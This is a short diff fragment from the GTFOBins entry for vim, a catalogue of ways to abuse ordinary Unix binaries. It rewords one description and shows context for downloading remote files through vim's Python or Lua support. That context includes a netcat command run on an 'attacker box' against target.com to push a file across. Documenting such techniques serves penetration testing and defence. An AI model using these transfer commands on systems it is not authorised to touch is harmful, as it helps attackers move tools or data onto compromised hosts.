GTFOBins/GTFOBins.github.io/_gtfobins/vim.md

         else: import urllib as r
         r.urlretrieve(e["URL"], e["LFILE"])
         vim.command(":q!")'
-    - description: Fetch remote file sent to a local TCP port.
+    - description: Fetch a remote file via TCP.
 Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
 This requires that `vim` is compiled with Lua support and that `lua-socket` is installed.
       code: |
         export LPORT=12345
         export LFILE=file_to_save